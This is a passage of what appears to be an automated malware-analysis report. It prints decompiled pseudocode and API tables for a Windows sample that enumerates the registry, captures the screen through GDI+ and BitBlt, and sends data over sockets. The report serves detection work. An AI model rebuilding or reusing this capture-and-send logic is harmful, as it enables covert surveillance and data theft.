									_t89 = 0x15;
								}
								E00424100(0x55, _t100 + 0x58);
								_push(_t89);
								_push(_t97);
								_push( *((intOrPtr*)(_t100 + 0x20)));
								_t96 =  *((intOrPtr*)(_t100 + 0x30));
								_push(_t64);
								_t58 = E00411D10( *((intOrPtr*)(_t100 + 0x20)), 0x311,  *((intOrPtr*)(_t100 + 0x30)), _t100 + 0x58);
								_t100 = _t100 + 0x14;
								if(_t58 > 0 && E00410D70(_t100 + 0x1c, _t96, _t58) != 0) {
									 *((intOrPtr*)(_t100 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x1c)) + 1;
								}
							}
						}
					}
					_t90 =  *(_t100 + 0x28);
					 *((intOrPtr*)(_t100 + 0x34)) = 0x104;
				} while (RegEnumKeyExW( *(_t100 + 0x10), _t90, _t100 + 0xd4, _t100 + 0x24, 0, 0, 0, 0) == 0);
				RegCloseKey( *(_t100 + 0x10));
				_t42 = HeapFree( *0x42e6d4, 0, _t97);
				if( *((intOrPtr*)(_t100 + 0x1c)) <= 0) {
					_t42 =  *(_t100 + 0x18);
					if(_t42 != 0) {
						_t42 = HeapFree( *0x42e6d4, 0, _t42);
					}
					goto L24;
				} else {
					_t87 =  *(_t100 + 0x18);
					if(_t87 == 0) {
						L24:
						return _t42;
					} else {
						if( *_t87 != 0) {
							E00424100(0x9c, _t100 + 0x2c8);
							E0040D880(_t87, 0xcb, _t100 + 0x2c8);
						}
						return HeapFree( *0x42e6d4, 0, _t87);
					}
				}
			}

0x00422838
0x00422840
0x00422840
0x0042285d
0x00422861
0x00422866
0x0042286d
0x00422890
0x00422890
0x00422899
0x0042289e
0x004228a5
0x004228cb
0x004228d0
0x004228d7
0x004228fd
0x00422902
0x0042290c
0x0042290c
0x0042291a
0x00422923
0x00422924
0x00422925
0x00422928
0x0042292c
0x00422933
0x00422938
0x0042293d
0x0042294f
0x0042294f
0x0042293d
0x004228d7
0x004228a5
0x00422953
0x00422972
0x00422980
0x0042298d
0x004229a2
0x004229a9
0x004229f0
0x004229f6
0x00422a01
0x00422a01
0x00000000
0x004229ab
0x004229ab
0x004229b1
0x00422a03
0x00422a0d
0x004229b3
0x004229b7
0x004229c5
0x004229d4
0x004229d4
0x004229ef
0x004229ef
0x004229b1

APIs

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0042297A
RegCloseKey.ADVAPI32(?), ref: 0042298D
HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 004229A2
HeapFree.KERNEL32(?,00000000,?), ref: 004229E3
HeapFree.KERNEL32(?,00000000,?), ref: 00422A01

Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5

Part of subcall function 00416580: RegOpenKeyExW.ADVAPI32 ref: 004165A6
Part of subcall function 00416580: RegQueryValueExW.ADVAPI32(00000001,00000004,00000000,80000001,00000000,?), ref: 004165CB
Part of subcall function 00416580: RegCloseKey.ADVAPI32(?), ref: 004165DD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$Close$OpenQueryValue$EnumEnvironmentExpandStrings
String ID:
API String ID: 1177184957-0
Opcode ID: 393ea42e9c88e46f22c4b284e20c00160a660ce89296dd1b2246a219e52af1ed
Instruction ID: ff1161b1b7c403a45acf30915b7bc32c2417ec951aefb7884e4610911f0ac06c
Opcode Fuzzy Hash: 393ea42e9c88e46f22c4b284e20c00160a660ce89296dd1b2246a219e52af1ed
Instruction Fuzzy Hash: 1C4116713043126BD320DB14ED80FAF77E9ABC4744F44492EF644972D0D7B8D88A879A

Uniqueness

Uniqueness Score: -1.00%

Function 004158A0, Relevance: 6.1, APIs: 4, Instructions: 123
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004158A0(WCHAR* _a4, signed int _a8) {
				signed int _t16;
				signed int _t18;
				long _t19;
				int _t20;
				void* _t22;
				void* _t24;
				void* _t27;
				void* _t32;
				void* _t34;
				signed int _t38;
				long _t40;
				void** _t44;
				WCHAR* _t48;
				void* _t61;
				void* _t62;

				_t38 = _a8;
				_t16 = _t38 & 0x00000003;
				if(_t16 == 0) {
					_t40 = 0x80000000;
					goto L6;
				} else {
					_t32 = _t16 - 1;
					if(_t32 == 0) {
						_t40 = 0x40000000;
						goto L6;
					} else {
						_t18 = _t32 - 1;
						if(_t18 != 0) {
							L19:
							return _t18 | 0xffffffff;
						} else {
							_t40 = 0xc0000000;
							L6:
							_t18 = _t38 & 0x00000700;
							_t61 = _t18 - 0x400;
							if(_t61 > 0) {
								if(_t18 == 0x500) {
									L21:
									_t19 = 1;
									goto L22;
								} else {
									if(_t18 == 0x600) {
										goto L20;
									} else {
										if(_t18 == 0x700) {
											goto L21;
										} else {
											goto L19;
										}
									}
								}
							} else {
								if(_t61 == 0) {
									L15:
									_t19 = 3;
									goto L22;
								} else {
									_t62 = _t18 - 0x200;
									if(_t62 > 0) {
										if(_t18 != 0x300) {
											goto L19;
										} else {
											_t19 = 2;
											goto L22;
										}
									} else {
										if(_t62 == 0) {
											L20:
											_t19 = 5;
											goto L22;
										} else {
											if(_t18 == 0) {
												goto L15;
											} else {
												if(_t18 != 0x100) {
													goto L19;
												} else {
													_t19 = 4;
													L22:
													_t48 = _a4;
													_t20 = CreateFileW(_t48, _t40, 3, 0, _t19, 0x80, 0);
													_t34 = _t20;
													if(_t34 == 0xffffffff) {
														L25:
														return _t20 | 0xffffffff;
													} else {
														_t22 =  *0x42d48c; // 0x0
														_t44 = HeapAlloc(_t22, 8, 0xc);
														if(_t44 != 0) {
															_t24 = 0;
															if(_t48 == 0) {
																L33:
																 *_t44 = _t24;
																_t44[2] = _a8;
																_t44[1] = _t34;
																return _t44;
															} else {
																if( *_t48 != 0) {
																	do {
																		_t24 = _t24 + 1;
																	} while (_t48[_t24] != 0);
																}
																_t51 = _t24 + _t24;
																_t27 = _t24 + _t24 + 2;
																if(_t27 != 0) {
																	_t24 = HeapAlloc( *0x42e6d4, 8, _t27 + 4);
																	if(_t24 != 0) {
																		_t24 = E00410820(_t24, _a4, _t51);
																	}
																	goto L33;
																} else {
																	 *_t44 = _t27;
																	_t44[2] = _a8;
																	_t44[1] = _t34;
																	return _t44;
																}
															}
														} else {
															_t20 = CloseHandle(_t34);
															goto L25;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x004158a0
0x004158a9
0x004158ac
0x004158c2
0x00000000
0x004158ae
0x004158ae
0x004158af
0x004158bb
0x00000000
0x004158b1
0x004158b1
0x004158b2
0x0041591c
0x0041591f
0x004158b4
0x004158b4
0x004158c7
0x004158c9
0x004158ce
0x004158d3
0x0041590c
0x00415929
0x00415929
0x00000000
0x0041590e
0x00415913
0x00000000
0x00415915
0x0041591a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041591a
0x00415913
0x004158d5
0x004158d5
0x00415900
0x00415900
0x00000000
0x004158d7
0x004158d7
0x004158dc
0x004158f7
0x00000000
0x004158f9
0x004158f9
0x00000000
0x004158f9
0x004158de
0x004158de
0x00415922
0x00415922
0x00000000
0x004158e0
0x004158e2
0x00000000
0x004158e4
0x004158e9
0x00000000
0x004158eb
0x004158eb
0x0041592e
0x00415931
0x00415944
0x0041594a
0x0041594f
0x00415970
0x00415977
0x00415951
0x00415951
0x00415963
0x00415967
0x0041597a
0x0041597e
0x004159cb
0x004159cb
0x004159d1
0x004159d4
0x004159dd
0x00415980
0x00415983
0x00415985
0x00415985
0x00415986
0x00415985
0x0041598d
0x00415990
0x00415995
0x004159b9
0x004159bd
0x004159c6
0x004159c6
0x00000000
0x00415997
0x00415997
0x0041599d
0x004159a0
0x004159a9
0x004159a9
0x00415995
0x00415969
0x0041596a
0x00000000
0x0041596a
0x00415967
0x0041594f
0x004158e9
0x004158e2
0x004158de
0x004158dc
0x004158d5
0x004158d3
0x004158b2
0x004158af

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000001,00000080,00000000), ref: 00415944
HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 00415961
CloseHandle.KERNEL32(00000000), ref: 0041596A
HeapAlloc.KERNEL32(?,00000008,?), ref: 004159B9

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$CloseCreateFileHandle
String ID:
API String ID: 541645184-0
Opcode ID: 2116d57bcf27c53ff8cd3b82ee7884e4741b4304ef9b494465a42e4c3026cd89
Instruction ID: bfb827b524dbe0126626c77bb06dcdecd0b48482eb91457c4ab8ad0666a80945
Opcode Fuzzy Hash: 2116d57bcf27c53ff8cd3b82ee7884e4741b4304ef9b494465a42e4c3026cd89
Instruction Fuzzy Hash: C531BEB1620A01DBE7209A28EC84BEBB398EBD0330F24492BE551D73D0D62CDCD5875A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D360, Relevance: 6.1, APIs: 4, Instructions: 116
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D360(void* __eax, void* __ecx) {
				void* __ebx;
				void* __edi;
				void* _t26;
				intOrPtr _t29;
				void* _t38;
				void* _t44;
				signed int _t52;
				intOrPtr _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void** _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t67;

				_t66 =  *((intOrPtr*)(_t67 + 0x18));
				_t63 = __eax;
				_t44 = __ecx;
				 *((intOrPtr*)(_t67 + 0x20)) = 2;
				if(__eax != 0) {
					_t60 =  *((intOrPtr*)(__eax + 0x14));
					if(_t60 != 0) {
						_t26 = HeapAlloc( *0x42e6d4, 0, _t60 + 4);
						if(_t26 != 0) {
							_t26 = E00410820(_t26, _t63, _t60);
						}
					} else {
						_t26 = 0;
					}
				} else {
					_t26 = HeapAlloc( *0x42e6d4, 8, 0x34);
					if(_t26 != 0) {
						 *((intOrPtr*)(_t26 + 0x14)) = 0x30;
					}
				}
				_t64 = _t66 + 0x14;
				 *_t64 = _t26;
				if(_t26 != 0) {
					_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 4))))();
					if(_t29 == 0) {
						if( *_t64 != 0 && E00418D30(_t64, 1,  *((intOrPtr*)(_t66 + 0x10))) != 0) {
							_t52 = 3;
							if( *((char*)(_t44 + 0xe)) == 2) {
								_t52 = 7;
							}
							_t61 = E004130B0(_t52,  *((intOrPtr*)(_t67 + 0x24)),  *((intOrPtr*)(_t44 + 4)),  *_t64, _t31);
							 *(_t67 + 0x1c) = _t61;
							if(_t61 != 0) {
								if(E00413180(_t61, _t67 + 0x18, 0,  *((intOrPtr*)(_t66 + 0xc))) != 0) {
									_t62 =  *(_t67 + 0x10);
									_t38 = E00419020( *((intOrPtr*)(_t66 + 0x10)),  *((intOrPtr*)(_t67 + 0x14)), _t62);
									E004107C0( *_t64);
									 *_t64 = _t62;
									if(_t38 != 0) {
										 *((intOrPtr*)(_t67 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 8))))();
									}
									_t61 =  *(_t67 + 0x1c);
								}
								InternetCloseHandle(_t61);
							}
						}
					} else {
						 *((intOrPtr*)(_t67 + 0x20)) = _t29;
					}
					_t65 =  *_t64;
					if(_t65 != 0) {
						HeapFree( *0x42e6d4, 0, _t65);
					}
				}
				return  *((intOrPtr*)(_t67 + 0x20));
			}

0x0040d365
0x0040d36a
0x0040d36d
0x0040d36f
0x0040d379
0x0040d398
0x0040d39d
0x0040d3b0
0x0040d3b8
0x0040d3bd
0x0040d3bd
0x0040d39f
0x0040d39f
0x0040d39f
0x0040d37b
0x0040d385
0x0040d38d
0x0040d38f
0x0040d38f
0x0040d38d
0x0040d3c2
0x0040d3c5
0x0040d3c9
0x0040d3d8
0x0040d3dc
0x0040d3ea
0x0040d404
0x0040d409
0x0040d40b
0x0040d40b
0x0040d422
0x0040d424
0x0040d42a
0x0040d43f
0x0040d448
0x0040d44c
0x0040d455
0x0040d45a
0x0040d45e
0x0040d46b
0x0040d46b
0x0040d46f
0x0040d46f
0x0040d474
0x0040d474
0x0040d42a
0x0040d3de
0x0040d3de
0x0040d3de
0x0040d47a
0x0040d47e
0x0040d48a
0x0040d48a
0x0040d47e
0x0040d49b

APIs

HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040D385
InternetCloseHandle.WININET(00000000), ref: 0040D474
HeapFree.KERNEL32(?,00000000,?), ref: 0040D48A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCloseFreeHandleInternet
String ID:
API String ID: 3482572630-0
Opcode ID: 4d9a4196873f99b5bb7a4e84b57f3c28e55a175288059e2775d0b9a81e111097
Instruction ID: 74fc9e69b0c4592212f1807142f1985e1369a7181b4dffe81a07b123a7425d8f
Opcode Fuzzy Hash: 4d9a4196873f99b5bb7a4e84b57f3c28e55a175288059e2775d0b9a81e111097
Instruction Fuzzy Hash: 0D4193756003019BD720DF95D940F6BB7E8AF88744F04492DBD84A7384DB78ED09CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 104
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040F730(void* __eax) {
				char _v680;
				char _v808;
				char _v1068;
				void* _v1190;
				void* _v1568;
				void* _v1628;
				void* _v1636;
				void* __esi;
				void* _t34;
				short _t36;
				WCHAR* _t40;
				int _t41;
				signed int _t42;
				WCHAR* _t43;
				signed char _t50;
				signed char _t55;
				signed int _t60;
				int _t63;
				void* _t64;

				E00410820(0x42eb80, __eax, 0x1e6);
				E0041D150( &_v808);
				E00410820( &_v1068,  &_v680, 0x102);
				_push(0x1e6);
				_push(0x42eb80);
				_push(_t64 + 0x34);
				_t34 = E00410820();
				_push(0x1e6);
				_push(_t34);
				E00412640( &_v1068);
				_t36 = 0;
				while(1) {
					_t50 =  *((intOrPtr*)(_t36 + 0x42eb70));
					_t55 =  *((intOrPtr*)(_t64 + _t36 + 0xa8));
					if(_t50 != _t55) {
						break;
					}
					_t36 = _t36 + 1;
					if(_t36 < 0x10) {
						continue;
					} else {
						L7:
						_t40 =  *0x42e954;
						_t60 = 0;
						if(_t40 != 0 &&  *_t40 != 0) {
							do {
								_t60 = _t60 + 1;
							} while (_t40[_t60] != 0);
						}
						_t63 = 0;
						if( *0x42e958 != 0) {
							do {
								_t63 = _t63 + 1;
							} while (0x42e958[_t63] != 0);
						}
						_t41 = 0;
						if( *((intOrPtr*)(_t64 + 0x1be)) != 0) {
							do {
								_t41 = _t41 + 1;
							} while ( *((char*)(_t64 + _t41 + 0x1be)) != 0);
						}
						_t42 = MultiByteToWideChar(0, 0, _t64 + 0x1ca, _t41, _t64 + 0xc, 0x14);
						if(_t42 >= 0x14) {
							_t42 = 0;
						}
						 *((short*)(_t64 + 8 + _t42 * 2)) = 0;
						if(_t60 <= _t63) {
							L24:
							return 0;
						} else {
							_t43 =  *0x42e954;
							if(_t43[_t63] != 0x5c || StrCmpNIW(0x42e958, _t43, _t63) != 0 || lstrcmpiW(_t64 + 8,  *0x42e954 + 2 + _t63 * 2) != 0) {
								goto L24;
							} else {
								return 1;
							}
						}
					}
					L25:
				}
				if((_t50 & 0x000000ff) != (_t55 & 0x000000ff)) {
					goto L24;
				} else {
					goto L7;
				}
				goto L25;
			}

0x0040f742
0x0040f74e
0x0040f768
0x0040f76d
0x0040f772
0x0040f77b
0x0040f77c
0x0040f781
0x0040f788
0x0040f78b
0x0040f790
0x0040f7a0
0x0040f7a0
0x0040f7a6
0x0040f7af
0x00000000
0x00000000
0x0040f7b1
0x0040f7b5
0x00000000
0x0040f7b7
0x0040f7c7
0x0040f7c7
0x0040f7cd
0x0040f7d1
0x0040f7d8
0x0040f7d8
0x0040f7d9
0x0040f7d8
0x0040f7e0
0x0040f7e9
0x0040f7f0
0x0040f7f0
0x0040f7f1
0x0040f7f0
0x0040f7fc
0x0040f805
0x0040f810
0x0040f810
0x0040f811
0x0040f810
0x0040f82f
0x0040f838
0x0040f83a
0x0040f83a
0x0040f840
0x0040f846
0x0040f889
0x0040f892
0x0040f848
0x0040f848
0x0040f852
0x00000000
0x0040f87f
0x0040f888
0x0040f888
0x0040f852
0x0040f846
0x00000000
0x0040f7b5
0x0040f7c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000014,?,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,0042EB80), ref: 0040F82F
StrCmpNIW.SHLWAPI(0042E958,?,C4815E01,?,00000000,?,?,00000016,?,?,00000000), ref: 0040F85B
lstrcmpiW.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0040F875

Strings

u5VPhXB, xrefs: 0040F852

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidelstrcmpi
String ID: u5VPhXB
API String ID: 1977948566-1119068662
Opcode ID: b3c3ccacc7cd96ae787adf447a6a087643d5706117f097b478f1270260d4574d
Instruction ID: 5961fea080fe2e4fd14b9dfdc621e6b01ce3f530e28e19340b9262f361ded59d
Opcode Fuzzy Hash: b3c3ccacc7cd96ae787adf447a6a087643d5706117f097b478f1270260d4574d
Instruction Fuzzy Hash: 9F31EA316042506AE334A765DC45BFB3799AB84780F90883BE446E35D1E67885CE83DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9F0, Relevance: 6.1, APIs: 4, Instructions: 92
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040A9F0(signed int __eax, intOrPtr _a4) {
				signed int _t23;
				void* _t26;
				void* _t28;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				void* _t42;
				void* _t45;
				intOrPtr* _t49;

				_t35 = _t34 | 0xffffffff;
				if(_a4 != 0) {
					_t36 =  *0x42d408; // 0x0
					_t23 = 0;
					_t45 =  *0x42d404; // 0x0
					if(_t36 <= 0) {
						L8:
						_t7 = _t36 * 8; // 0x9
						_t26 = _t36 + _t7 + 9 + _t36 + _t7 + 9 + _t36 + _t7 + 9 + _t36 + _t7 + 9;
						if(_t26 != 0) {
							_push(_t26 + 4);
							if(_t45 != 0) {
								_t28 = HeapReAlloc( *0x42e6d4, 8, _t45, ??);
							} else {
								_t28 = HeapAlloc( *0x42e6d4, 8, ??);
							}
							if(_t28 != 0) {
								_t36 =  *0x42d408; // 0x0
								goto L17;
							}
						} else {
							if(_t45 != 0) {
								HeapFree( *0x42e6d4, 0, _t45);
								_t36 =  *0x42d408; // 0x0
							}
							_t28 = 0;
							L17:
							_t35 = _t36;
							 *0x42d408 = _t36 + 1;
							_t49 = _t28 + (_t35 + _t35 * 8) * 4;
							 *0x42d404 = _t28;
							if(_t49 != 0) {
								goto L18;
							}
						}
					} else {
						_t42 = _t45;
						while( *_t42 != 0) {
							_t23 = _t23 + 1;
							_t42 = _t42 + 0x24;
							if(_t23 < _t36) {
								continue;
							} else {
								goto L8;
							}
							goto L19;
						}
						_t49 = _t45 + (_t23 + _t23 * 8) * 4;
						_t35 = _t23;
						if(_t49 != 0) {
							L18:
							 *_t49 = _a4;
							 *((intOrPtr*)(_t49 + 4)) = CreateEventW(0, 0, 0, 0);
							 *((intOrPtr*)(_t49 + 8)) = 0;
							 *((intOrPtr*)(_t49 + 0xc)) = 0;
							 *((intOrPtr*)(_t49 + 0x10)) = 0;
							 *((intOrPtr*)(_t49 + 0x14)) = 0;
							 *((intOrPtr*)(_t49 + 0x18)) = 0xffffffff;
							 *((intOrPtr*)(_t49 + 0x1c)) = 0;
							 *((intOrPtr*)(_t49 + 0x20)) = 0;
						} else {
							goto L8;
						}
					}
					L19:
					return _t35;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x0040a9f4
0x0040a9fb
0x0040aa05
0x0040aa0c
0x0040aa0f
0x0040aa17
0x0040aa3a
0x0040aa3a
0x0040aa40
0x0040aa44
0x0040aa65
0x0040aa68
0x0040aa85
0x0040aa6a
0x0040aa73
0x0040aa73
0x0040aa8d
0x0040aa8f
0x00000000
0x0040aa8f
0x0040aa46
0x0040aa48
0x0040aa52
0x0040aa58
0x0040aa58
0x0040aa5e
0x0040aa95
0x0040aa95
0x0040aa98
0x0040aaa1
0x0040aaa4
0x0040aaab
0x00000000
0x00000000
0x0040aaab
0x0040aa19
0x0040aa19
0x0040aa20
0x0040aa24
0x0040aa25
0x0040aa2a
0x00000000
0x0040aa2c
0x00000000
0x0040aa2c
0x00000000
0x0040aa2a
0x0040aa31
0x0040aa34
0x0040aa38
0x0040aaad
0x0040aab5
0x0040aabd
0x0040aac0
0x0040aac3
0x0040aac6
0x0040aac9
0x0040aacc
0x0040aad3
0x0040aad6
0x00000000
0x00000000
0x00000000
0x0040aa38
0x0040aad9
0x0040aadf
0x0040a9fe
0x0040aa02
0x0040aa02

APIs

HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,0040AB24,?,0040BD74), ref: 0040AA52
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0040AB24,?,0040BD74), ref: 0040AAB7

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateEventFreeHeap
String ID:
API String ID: 3847225737-0
Opcode ID: 425e52b32ff9126d9033a2a9494d6238b06a75ea9bfe51b7ddb1aa70a179a242
Instruction ID: 7ed1c2aa4d533b445f8c0d06a9eb0118217a9931649683160e035c9c817fc50c
Opcode Fuzzy Hash: 425e52b32ff9126d9033a2a9494d6238b06a75ea9bfe51b7ddb1aa70a179a242
Instruction Fuzzy Hash: 8431A472B003088FC334AF65ED84857B7A8E754315350853EE152A76D0D735B856CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EEC0, Relevance: 6.1, APIs: 4, Instructions: 86
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041EEC0(void* __eax, void* __ecx) {
				void* _v8;
				void* _v36;
				void* _v84;
				void* _v88;
				void* _v104;
				void* _t23;
				void* _t27;
				void _t33;
				signed int _t34;
				void* _t48;
				void* _t49;
				intOrPtr* _t50;
				void* _t51;

				_push(0);
				_t34 = 0;
				_t50 = E0041E910();
				if(_t50 == 0) {
					L9:
					 *(_t51 + 0x24) = 0;
					__imp__#19( *((intOrPtr*)(_t51 + 0x64)), _t51 + 0x1c, 4, 0);
					L10:
					return _t34;
				}
				_t23 =  *((intOrPtr*)( *((intOrPtr*)( *_t50 + 0x30))))(_t50, _t51 + 0x1c, 1);
				if(_t23 == 0 &&  *(_t51 + 0x24) == _t23) {
					_t27 =  *(_t51 + 0x20) + 4;
					if(_t27 != 0) {
						_t49 = HeapAlloc( *0x42e6d4, 8, _t27 + 4);
						if(_t49 != 0) {
							_push(_t51 + 0x20);
							_push( *(_t51 + 0x20));
							_t8 = _t49 + 4; // 0x4
							_push(_t50);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t50 + 0xc))))() == 0) {
								_t33 =  *(_t51 + 0x20);
								 *_t49 = _t33;
								_t48 =  *(_t51 + 0x20) + 4;
								__imp__#19( *((intOrPtr*)(_t51 + 0x64)), _t49, _t48, 0);
								_t34 = 0 | _t33 == _t48;
							}
							HeapFree( *0x42e6d4, 0, _t49);
						}
					}
				}
				 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 8))))(_t50);
				if(_t34 != 0) {
					goto L10;
				}
				goto L9;
			}

0x0041eec7
0x0041eecb
0x0041eed2
0x0041eed6
0x0041ef71
0x0041ef7f
0x0041ef87
0x0041ef90
0x0041ef96
0x0041ef96
0x0041eeea
0x0041eeee
0x0041eefa
0x0041eefd
0x0041ef12
0x0041ef16
0x0041ef23
0x0041ef24
0x0041ef28
0x0041ef2c
0x0041ef31
0x0041ef33
0x0041ef3b
0x0041ef43
0x0041ef49
0x0041ef51
0x0041ef51
0x0041ef5e
0x0041ef5e
0x0041ef16
0x0041eefd
0x0041ef6b
0x0041ef6f
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0041E910: VirtualProtect.KERNEL32(00409C70,000005DC,00000004,?,?,00000000,?,00000000), ref: 0041E92E
Part of subcall function 0041E910: LoadLibraryA.KERNEL32 ref: 0041E95D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041E96D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041E979
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041E985
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041E991
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041E99D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041E9A9
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041E9B5
Part of subcall function 0041E910: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041EA04
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041EA10
Part of subcall function 0041E910: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041EA23
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041EA2D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041EA37
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041EA43
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041EA4F
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041EA5B
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041EA67

HeapAlloc.KERNEL32(?,00000008,?,?,?), ref: 0041EF0C
send.WS2_32(?,00000000,?,00000000), ref: 0041EF49
HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 0041EF5E
send.WS2_32(?,00000000), ref: 0041EF87

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$Heapsend$AllocFreeProtectVirtual
String ID:
API String ID: 3594632292-0
Opcode ID: 6d95dc7a3ce484bc43714ece189c22360f8675275d592343b8b07197da4622e6
Instruction ID: 3293d0f0a0844492b0d24ae2373d9b728b267af3931682051a70ed358ee0b2da
Opcode Fuzzy Hash: 6d95dc7a3ce484bc43714ece189c22360f8675275d592343b8b07197da4622e6
Instruction Fuzzy Hash: 9B217C7A240305BFD314DB15CC44FAB77A9FB98B18F048519FE899B290D634E905CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041E400, Relevance: 6.1, APIs: 4, Instructions: 83
injectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E400(intOrPtr __eax, void* __edx) {
				void* _t24;
				void* _t29;
				char _t35;
				intOrPtr _t38;
				void** _t45;
				void* _t48;
				signed int _t51;
				void* _t54;

				 *((char*)(_t54 + 3)) = 1;
				if(__eax == 0) {
					return 1;
				} else {
					_t45 = __edx + 8;
					 *((intOrPtr*)(_t54 + 0x18)) = __eax;
					do {
						_t24 =  *_t45;
						 *(_t54 + 0x1c) = _t24;
						if(_t24 != 0) {
							_t48 =  *(_t45 - 8);
							_t51 = _t45[1] & 0x000000ff;
							_t35 = 0;
